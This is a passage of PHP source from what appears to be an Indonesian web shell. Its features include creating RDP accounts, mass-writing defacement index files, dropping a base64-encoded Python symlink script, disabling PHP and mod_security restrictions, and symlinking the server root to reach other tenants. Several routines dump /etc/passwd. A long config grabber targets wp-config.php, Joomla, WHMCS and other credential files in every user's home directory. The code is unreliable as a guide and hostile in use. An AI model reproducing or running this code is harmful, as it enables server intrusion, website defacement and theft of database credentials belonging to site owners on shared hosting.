  1069.                         echo "<font color=blue>Berhasil</font>";
  1070.                     } else {
  1071.                         echo "<font color=red>Gagal</font>";
  1072.                     }
  1073.                 } else {
  1074.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  1075.                 }
  1076.             } else {
  1077.                 //
  1078.             }
  1079.         } else {
  1080.             echo "-- Create RDP --<br>
  1081.             <form method='post'>
  1082.             <input type='text' name='user' placeholder='username' value='Shun403' required>
  1083.             <input type='text' name='pass' placeholder='password' value='Shun403' required>
  1084.             <input type='submit' name='create' value='>>'>
  1085.             </form>
  1086.             -- Option --<br>
  1087.             <form method='post'>
  1088.             <input type='text' name='r_user' placeholder='username' required>
  1089.             <select name='opsi'>
  1090.             <option value='1'>Cek Username</option>
  1091.             <option value='2'>Ubah Password</option>
  1092.             <option value='3'>Hapus Username</option>
  1093.             </select>
  1094.             <input type='submit' name='s_opsi' value='>>'>
  1095.             </form>
  1096.             ";
  1097.         }
  1098.     } else {
  1099.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1100.     }
  1101.     }
  1102.  
  1103. elseif($_GET['c'] == 'bypsmas') {
  1104.     echo "<center><form method='POST'>";
  1105. echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>";
  1106. echo "File Name : <input type='text' name='file_name' value='images.php'><br><br>";
  1107. echo "Your Index : <br><textarea style='width: 400px; height: 330px;' name='index'>//Put Your Index Here</textarea><br>";
  1108. echo "<input type='submit' value='Start'></form></center>";
  1109.  
  1110. if (isset ($_POST['base_dir']))
  1111. {
  1112.         if (!file_exists ($_POST['base_dir']))
  1113.                 die ($_POST['base_dir']." Not Found !<br>");
  1114.  
  1115.         if (!is_dir ($_POST['base_dir']))
  1116.                 die ($_POST['base_dir']." Is Not A Directory !<br>");
  1117.  
  1118.         @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
  1119.  
  1120.         $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");
  1121.  
  1122.         foreach ($files as $file):
  1123.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  1124.                 {
  1125.                         $index = getcwd ().$file."/".$_POST['file_name'];
  1126.                         if (file_put_contents ($index, $_POST['index']))
  1127.                                 echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  1128.                 }
  1129.         endforeach;
  1130. }
  1131. }
  1132.   elseif($_GET['c'] == 'cgi') {
  1133.     $cgi_dir = mkdir('rabbitz_cgi', 0755);
  1134.         chdir('rabbitz_cgi');
  1135.     $file_cgi = "cgi.rabbitz";
  1136.         $memeg = ".htaccess";
  1137.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .rabbitz \n AddHandler cgi-script .rabbitz \n AddHandler cgi-script .rabbitz";
  1138.     $htcgi = fopen(".htaccess", "w");
  1139.     $cgi_script = "";
  1140.     $cgi = fopen($file_cgi, "w");
  1141.     fwrite($cgi, base64_decode($cgi_script));
  1142.     fwrite($htcgi, $isi_htcgi);
  1143.     chmod($file_cgi, 0755);
  1144.         chmod($memeg, 0755);
  1145.     echo "<br><center>Done ... <a href='rabbitz_cgi/cgi.rabbitz' target='_blank'>Klik Here</a>";
  1146. }elseif($_GET['c'] == 'python') {
  1147.     $sym_dir = mkdir('rabbitz_sympy', 0755);
  1148.         chdir('rabbitz_sympy');
  1149.     $file_sym = "sym.py";
  1150.     $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  1151.         $sym = fopen($file_sym, "w");
  1152.     fwrite($sym, base64_decode($sym_script));
  1153.     chmod($file_sym, 0755);
  1154.         $jancok = exe("python sym.py");
  1155.     echo "<br><center>Done ... <a href='rabbitz_sympy/brudulsympy/' target='_blank'>Klik Here</a>";
  1156. } elseif($_GET['c'] == 'disablefunc'){
  1157.         echo "<br><br><center>";
  1158.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' />&nbsp;<input type=submit name=litini value='Litespeed' /></form>";
  1159.         if(isset($_POST['ini']))
  1160. {
  1161.         $file = fopen("php.ini","w");
  1162.         echo fwrite($file,"disable_functions=none
  1163. safe_mode = Off
  1164.     ");
  1165.         fclose($file);
  1166.         echo "<a href='php.ini'>click here!</a>";
  1167. }       if(isset($_POST['htce']))
  1168. {
  1169.         $file = fopen(".htaccess","w");
  1170.         echo fwrite($file,"<IfModule mod_security.c>
  1171. SecFilterEngine Off
  1172. SecFilterScanPOST Off
  1173. </IfModule>
  1174.     ");
  1175.         fclose($file);
  1176.         echo "htaccess successfully created!";
  1177. }               if(isset($_POST['litini'])){
  1178.         $iniph = '<? n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["file"]); n ini_restore("safe_mode"); n ini_restore("open_basedir"); n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["ss"]; n ?>';
  1179.              $byph = "safe_mode = Off n disable_functions= ";
  1180.         $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
  1181.         file_put_contents("php.ini",base64_decode($byph));
  1182.         file_put_contents("ini.php",base64_decode($iniph));
  1183.         file_put_contents(".htaccess",base64_decode($comp));
  1184.         echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  1185.         echo"</center>";
  1186. }
  1187. } elseif ($_GET['c'] == '404'){
  1188. @error_reporting(0);
  1189. @ini_set('display_errors', 0);
  1190. echo '<center><b><a href="https://www.facebook.com/rinto2234">Coded By Con7ext</a></b><br>
  1191. <form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  1192. <br>
  1193. <br>Save As: <input name="jnck" value="ojayakan.txt"><input name="ojaykan" type="submit" value="Eksekusi Gan"></form><br>';
  1194. if($_POST['ojaykan']){
  1195. rmdir("rabbitz_symlink404");mkdir("rabbitz_symlink404", 0777);
  1196. $dir = $_POST['dir'];
  1197. $jnck = $_POST['jnck'];
  1198. system("ln -s ".$dir." rabbitz_symlink404/".$jnck);
  1199. symlink($dir,"rabbitz_symlink404/".$jnck);
  1200. $inija = fopen("rabbitz_symlink404/.htaccess", "w");
  1201. fwrite($inija,"ReadmeName ".$jnck."
  1202. Options Indexes FollowSymLinks
  1203. DirectoryIndex ngeue.htm
  1204. AddType text/plain .php
  1205. AddHandler text/plain .php
  1206. Satisfy Any
  1207. ");
  1208. echo'<a href="rabbitz_symlink404/" target="_blank">Klik Gan >:(</a>';
  1209. }
  1210. }
  1211. elseif($_GET['c'] == 'passwd') {
  1212.     echo '<br><br><center>Bypass etc/passw With:<br>
  1213. <table style="width:50%">
  1214.   <tr>
  1215.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  1216.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  1217.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  1218.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  1219.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  1220. </tr></table>Bypass User With : <table style="width:50%">
  1221. <tr>
  1222.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  1223.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  1224.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  1225.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  1226.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  1227. </tr>
  1228. </table><br>';
  1229.  
  1230.  
  1231. if ($_POST['awkuser']) {
  1232. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1233. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1234. echo "</textarea><br>";
  1235. }
  1236. if ($_POST['systuser']) {
  1237. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1238. echo system("ls /var/mail");
  1239. echo "</textarea><br>";
  1240. }
  1241. if ($_POST['passthuser']) {
  1242. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1243. echo passthru("ls /var/mail");
  1244. echo "</textarea><br>";
  1245. }
  1246. if ($_POST['exuser']) {
  1247. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1248. echo exec("ls /var/mail");
  1249. echo "</textarea><br>";
  1250. }
  1251. if ($_POST['shexuser']) {
  1252. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1253. echo shell_exec("ls /var/mail");
  1254. echo "</textarea><br>";
  1255. }
  1256. if($_POST['syst'])
  1257. {
  1258. echo"<textarea class='inputz' cols='65' rows='15'>";
  1259. echo system("cat /etc/passwd");
  1260. echo"</textarea><br><br><b></b><br>";
  1261. }
  1262. if($_POST['passth'])
  1263. {
  1264. echo"<textarea class='inputz' cols='65' rows='15'>";
  1265. echo passthru("cat /etc/passwd");
  1266. echo"</textarea><br><br><b></b><br>";
  1267. }
  1268. if($_POST['ex'])
  1269. {
  1270. echo"<textarea class='inputz' cols='65' rows='15'>";
  1271. echo exec("cat /etc/passwd");
  1272. echo"</textarea><br><br><b></b><br>";
  1273. }
  1274. if($_POST['shex'])
  1275. {
  1276. echo"<textarea class='inputz' cols='65' rows='15'>";
  1277. echo shell_exec("cat /etc/passwd");
  1278. echo"</textarea><br><br><b></b><br>";
  1279. }
  1280. echo '<center>';
  1281. if($_POST['melex'])
  1282. {
  1283. echo"<textarea class='inputz' cols='65' rows='15'>";
  1284. for($uid=0;$uid<60000;$uid++){
  1285. $ara = posix_getpwuid($uid);
  1286. if (!empty($ara)) {
  1287. while (list ($key, $val) = each($ara)){
  1288. print "$val:";
  1289. }
  1290. print "\n";
  1291. }
  1292. }
  1293. echo"</textarea><br><br>";
  1294. }
  1295. } elseif($_GET['kill'] == 'self') {
  1296.     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1297.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  1298.         else
  1299.             echo '<center>unlink failed!</center>';
  1300. }
  1301. elseif($_GET['c'] == 'server') {
  1302. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  1303. $d0mains = @file("/etc/named.conf");
  1304. ##httaces
  1305. if($d0mains){
  1306. @mkdir("rabbitz_sym",0777);
  1307. @chdir("rabbitz_sym");
  1308. @exe("ln -s / root");
  1309. $file3 = 'Options Indexes FollowSymLinks
  1310. DirectoryIndex rabbitz.htm
  1311. AddType text/plain .php
  1312. AddHandler text/plain .php
  1313. Satisfy Any';
  1314. $fp3 = fopen('.htaccess','w');
  1315. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1316. echo "<br>
  1317. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1318. <tr>
  1319. <td align=center><font size=2>S. No.</font></td>
  1320. <td align=center><font size=2>Domains</font></td>
  1321. <td align=center><font size=2>Users</font></td>
  1322. <td align=center><font size=2>Symlink</font></td>
  1323. </tr>";
  1324. $dcount = 1;
  1325. foreach($d0mains as $d0main){
  1326. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1327. flush();
  1328. if(strlen(trim($domains[1][0])) > 2){
  1329. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1330. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1331. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1332. <td>".$user['name']."</td>
  1333. <td><a href='$full/rabbitz_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1334. flush();
  1335. $dcount++;}}}
  1336. echo "</table>";
  1337. }else{
  1338. $TEST=@file('/etc/passwd');
  1339. if ($TEST){
  1340. @mkdir("rabbitz_sym",0777);
  1341. @chdir("rabbitz_sym");
  1342. exe("ln -s / root");
  1343. $file3 = 'Options Indexes FollowSymLinks
  1344. DirectoryIndex rabbitz.htm
  1345. AddType text/plain .php
  1346. AddHandler text/plain .php
  1347. Satisfy Any';
  1348.  $fp3 = fopen('.htaccess','w');
  1349.  $fw3 = fwrite($fp3,$file3);
  1350.  @fclose($fp3);
  1351.  echo "
  1352.  <table align=center border=1><tr>
  1353.  <td align=center><font size=3>S. No.</font></td>
  1354.  <td align=center><font size=3>Users</font></td>
  1355.  <td align=center><font size=3>Symlink</font></td></tr>";
  1356.  $dcount = 1;
  1357.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1358.  while(!feof($file)){
  1359.  $s = fgets($file);
  1360.  $matches = array();
  1361.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1362.  $matches = str_replace("home/","",$matches[1]);
  1363.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1364.  continue;
  1365.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1366.  <td align=center><font class=txt>" . $matches . "</td>";
  1367.  echo "<td align=center><font class=txt><a href=$full/rabbitz_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1368.  $dcount++;}fclose($file);
  1369.  echo "</table>";}else{if($os != "Windows"){@mkdir("rabbitz_sym",0777);@chdir("rabbitz_sym");@exe("ln -s / root");$file3 = '
  1370.  Options Indexes FollowSymLinks
  1371. DirectoryIndex rabbitz.htm
  1372. AddType text/plain .php
  1373. AddHandler text/plain .php
  1374. Satisfy Any
  1375. ';
  1376.  $fp3 = fopen('.htaccess','w');
  1377.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1378.  echo "
  1379.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1380.  <table align=center border=1><tr>
  1381.  <td align=center><font size=3>ID</font></td>
  1382.  <td align=center><font size=3>Users</font></td>
  1383.  <td align=center><font size=3>Symlink</font></td></tr>";
  1384.  $temp = "";$val1 = 0;$val2 = 1000;
  1385.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1386.  if ($uid)$temp .= join(':',$uid)."\n";}
  1387.  echo '<br/>';$temp = trim($temp);$file5 =
  1388.  fopen("test.txt","w");
  1389.  fputs($file5,$temp);
  1390.  fclose($file5);$dcount = 1;$file =
  1391.  fopen("test.txt", "r") or exit("Unable to open file!");
  1392.  while(!feof($file)){$s = fgets($file);$matches = array();
  1393.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1394.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1395.  continue;
  1396.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1397.  <td align=center><font class=txt>" . $matches . "</td>";
  1398.  echo "<td align=center><font class=txt><a href=$full/rabbitz_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1399.  $dcount++;}
  1400.  fclose($file);
  1401.  echo "</table></div></center>";unlink("test.txt");
  1402.  } else
  1403.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1404.  }
  1405.  }
  1406. } elseif($_GET['config'] == 'grabber') {
  1407.             if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1408. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1409. exit;
  1410. }
  1411.     if($_POST){ if($_POST['config'] == 'symvhosts') {
  1412.         @mkdir("rabbitz_symvhosts", 0777);
  1413. exe("ln -s / rabbitz_symvhosts/root");
  1414. $htaccess="Options Indexes FollowSymLinks
  1415. DirectoryIndex rabbitz.htm
  1416. AddType text/plain .php
  1417. AddHandler text/plain .php
  1418. Satisfy Any";
  1419. @file_put_contents("rabbitz_symvhosts/.htaccess",$htaccess);
  1420.         $etc_passwd=$_POST['passwd'];
  1421.    
  1422.     $etc_passwd=explode("\n",$etc_passwd);
  1423. foreach($etc_passwd as $passwd){
  1424. $pawd=explode(":",$passwd);
  1425. $user =$pawd[5];
  1426. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1427. if (preg_match('/vhosts/i',$user)){
  1428. exe("ln -s ".$user."/httpdocs/wp-config.php rabbitz_symvhosts/".$jembod."-Wordpress.txt");
  1429. exe("ln -s ".$user."/httpdocs/configuration.php rabbitz_symvhosts/".$jembod."-Joomla.txt");
  1430. exe("ln -s ".$user."/httpdocs/config/koneksi.php rabbitz_symvhosts/".$jembod."-Lokomedia.txt");
  1431. exe("ln -s ".$user."/httpdocs/forum/config.php rabbitz_symvhosts/".$jembod."-phpBB.txt");
  1432. exe("ln -s ".$user."/httpdocs/sites/default/settings.php rabbitz_symvhosts/".$jembod."-Drupal.txt");
  1433. exe("ln -s ".$user."/httpdocs/config/settings.inc.php rabbitz_symvhosts/".$jembod."-PrestaShop.txt");
  1434. exe("ln -s ".$user."/httpdocs/app/etc/local.xml rabbitz_symvhosts/".$jembod."-Magento.txt");
  1435. exe("ln -s ".$user."/httpdocs/admin/config.php rabbitz_symvhosts/".$jembod."-OpenCart.txt");
  1436. exe("ln -s ".$user."/httpdocs/application/config/database.php rabbitz_symvhosts/".$jembod."-Ellislab.txt");
  1437. }}}
  1438. if($_POST['config'] == 'c') {
  1439. @mkdir("rabbitz_symconfig", 0777);
  1440. @symlink("/","rabbitz_symconfig/root");
  1441. $htaccess="Options Indexes FollowSymLinks
  1442. DirectoryIndex rabbitz.htm
  1443. AddType text/plain .php
  1444. AddHandler text/plain .php
  1445. Satisfy Any";
  1446. @file_put_contents("rabbitz_symconfig/.htaccess",$htaccess);}
  1447. if($_POST['config'] == '404') {
  1448. @mkdir("rabbitz_sym404", 0777);
  1449. @symlink("/","rabbitz_sym404/root");
  1450. $htaccess="Options Indexes FollowSymLinks
  1451. DirectoryIndex rabbitz.htm
  1452. AddType text/plain .php
  1453. AddHandler text/plain .php
  1454. Satisfy Any
  1455. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1456. IndexIgnore *.txt404
  1457. RewriteEngine On
  1458. RewriteCond %{REQUEST_FILENAME} ^.*rabbitz_sym404 [NC]
  1459. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1460. @file_put_contents("rabbitz_sym404/.htaccess",$htaccess);
  1461. }
  1462. if($_POST['config'] == 'grab') {
  1463.                         mkdir("rabbitz_configgrab", 0777);
  1464.                         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1465.                         $htc = fopen("rabbitz_configgrab/.htaccess","w");
  1466.                         fwrite($htc, $isi_htc);
  1467. }
  1468. $passwd = $_POST['passwd'];
  1469.  
  1470. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1471. foreach($user_config[1] as $user_rabbitz) {
  1472. $grab_config = array(
  1473. "/home/$user_rabbitz/.accesshash" => "WHM-accesshash",
  1474. "/home/$user_rabbitz/public_html/config/koneksi.php" => "Lokomedia",
  1475. "/home/$user_rabbitz/public_html/forum/config.php" => "phpBB",
  1476. "/home/$user_rabbitz/public_html/sites/default/settings.php" => "Drupal",
  1477. "/home/$user_rabbitz/public_html/config/settings.inc.php" => "PrestaShop",
  1478. "/home/$user_rabbitz/public_html/app/etc/local.xml" => "Magento",
  1479. "/home/$user_rabbitz/public_html/admin/config.php" => "OpenCart",
  1480. "/home/$user_rabbitz/public_html/application/config/database.php" => "Ellislab",
  1481. "/home/$user_rabbitz/public_html/vb/includes/config.php" => "Vbulletin",
  1482. "/home/$user_rabbitz/public_html/includes/config.php" => "Vbulletin",
  1483. "/home/$user_rabbitz/public_html/forum/includes/config.php" => "Vbulletin",
  1484. "/home/$user_rabbitz/public_html/forums/includes/config.php" => "Vbulletin",
  1485. "/home/$user_rabbitz/public_html/cc/includes/config.php" => "Vbulletin",
  1486. "/home/$user_rabbitz/public_html/inc/config.php" => "MyBB",
  1487. "/home/$user_rabbitz/public_html/includes/configure.php" => "OsCommerce",
  1488. "/home/$user_rabbitz/public_html/shop/includes/configure.php" => "OsCommerce",
  1489. "/home/$user_rabbitz/public_html/os/includes/configure.php" => "OsCommerce",
  1490. "/home/$user_rabbitz/public_html/oscom/includes/configure.php" => "OsCommerce",
  1491. "/home/$user_rabbitz/public_html/products/includes/configure.php" => "OsCommerce",
  1492. "/home/$user_rabbitz/public_html/cart/includes/configure.php" => "OsCommerce",
  1493. "/home/$user_rabbitz/public_html/inc/conf_global.php" => "IPB",
  1494. "/home/$user_rabbitz/public_html/wp-config.php" => "Wordpress",
  1495. "/home/$user_rabbitz/public_html/wp/test/wp-config.php" => "Wordpress",
  1496. "/home/$user_rabbitz/public_html/blog/wp-config.php" => "Wordpress",
  1497. "/home/$user_rabbitz/public_html/beta/wp-config.php" => "Wordpress",
  1498. "/home/$user_rabbitz/public_html/portal/wp-config.php" => "Wordpress",
  1499. "/home/$user_rabbitz/public_html/site/wp-config.php" => "Wordpress",
  1500. "/home/$user_rabbitz/public_html/wp/wp-config.php" => "Wordpress",
  1501. "/home/$user_rabbitz/public_html/WP/wp-config.php" => "Wordpress",
  1502. "/home/$user_rabbitz/public_html/news/wp-config.php" => "Wordpress",
  1503. "/home/$user_rabbitz/public_html/wordpress/wp-config.php" => "Wordpress",
  1504. "/home/$user_rabbitz/public_html/test/wp-config.php" => "Wordpress",
  1505. "/home/$user_rabbitz/public_html/demo/wp-config.php" => "Wordpress",
  1506. "/home/$user_rabbitz/public_html/home/wp-config.php" => "Wordpress",
  1507. "/home/$user_rabbitz/public_html/v1/wp-config.php" => "Wordpress",
  1508. "/home/$user_rabbitz/public_html/v2/wp-config.php" => "Wordpress",
  1509. "/home/$user_rabbitz/public_html/press/wp-config.php" => "Wordpress",
  1510. "/home/$user_rabbitz/public_html/new/wp-config.php" => "Wordpress",
  1511. "/home/$user_rabbitz/public_html/blogs/wp-config.php" => "Wordpress",
  1512. "/home/$user_rabbitz/public_html/configuration.php" => "Joomla",
  1513. "/home/$user_rabbitz/public_html/blog/configuration.php" => "Joomla",
  1514. "/home/$user_rabbitz/public_html/submitticket.php" => "^WHMCS",
  1515. "/home/$user_rabbitz/public_html/cms/configuration.php" => "Joomla",
  1516. "/home/$user_rabbitz/public_html/beta/configuration.php" => "Joomla",
  1517. "/home/$user_rabbitz/public_html/portal/configuration.php" => "Joomla",
  1518. "/home/$user_rabbitz/public_html/site/configuration.php" => "Joomla",
  1519. "/home/$user_rabbitz/public_html/main/configuration.php" => "Joomla",
  1520. "/home/$user_rabbitz/public_html/home/configuration.php" => "Joomla",
  1521. "/home/$user_rabbitz/public_html/demo/configuration.php" => "Joomla",
  1522. "/home/$user_rabbitz/public_html/test/configuration.php" => "Joomla",
  1523. "/home/$user_rabbitz/public_html/v1/configuration.php" => "Joomla",
  1524. "/home/$user_rabbitz/public_html/v2/configuration.php" => "Joomla",
  1525. "/home/$user_rabbitz/public_html/joomla/configuration.php" => "Joomla",
  1526. "/home/$user_rabbitz/public_html/new/configuration.php" => "Joomla",
  1527. "/home/$user_rabbitz/public_html/WHMCS/submitticket.php" => "WHMCS",
  1528. "/home/$user_rabbitz/public_html/whmcs1/submitticket.php" => "WHMCS",
  1529. "/home/$user_rabbitz/public_html/Whmcs/submitticket.php" => "WHMCS",
  1530. "/home/$user_rabbitz/public_html/whmcs/submitticket.php" => "WHMCS",
  1531. "/home/$user_rabbitz/public_html/whmcs/submitticket.php" => "WHMCS",
  1532. "/home/$user_rabbitz/public_html/WHMC/submitticket.php" => "WHMCS",
  1533. "/home/$user_rabbitz/public_html/Whmc/submitticket.php" => "WHMCS",
  1534. "/home/$user_rabbitz/public_html/whmc/submitticket.php" => "WHMCS",
  1535. "/home/$user_rabbitz/public_html/WHM/submitticket.php" => "WHMCS",
  1536. "/home/$user_rabbitz/public_html/Whm/submitticket.php" => "WHMCS",
  1537. "/home/$user_rabbitz/public_html/whm/submitticket.php" => "WHMCS",
  1538. "/home/$user_rabbitz/public_html/HOST/submitticket.php" => "WHMCS",
  1539. "/home/$user_rabbitz/public_html/Host/submitticket.php" => "WHMCS",
  1540. "/home/$user_rabbitz/public_html/host/submitticket.php" => "WHMCS",
  1541. "/home/$user_rabbitz/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1542. "/home/$user_rabbitz/public_html/Supportes/submitticket.php" => "WHMCS",
  1543. "/home/$user_rabbitz/public_html/supportes/submitticket.php" => "WHMCS",
  1544. "/home/$user_rabbitz/public_html/domains/submitticket.php" => "WHMCS",
  1545. "/home/$user_rabbitz/public_html/domain/submitticket.php" => "WHMCS",
  1546. "/home/$user_rabbitz/public_html/Hosting/submitticket.php" => "WHMCS",
  1547. "/home/$user_rabbitz/public_html/HOSTING/submitticket.php" => "WHMCS",
  1548. "/home/$user_rabbitz/public_html/hosting/submitticket.php" => "WHMCS",
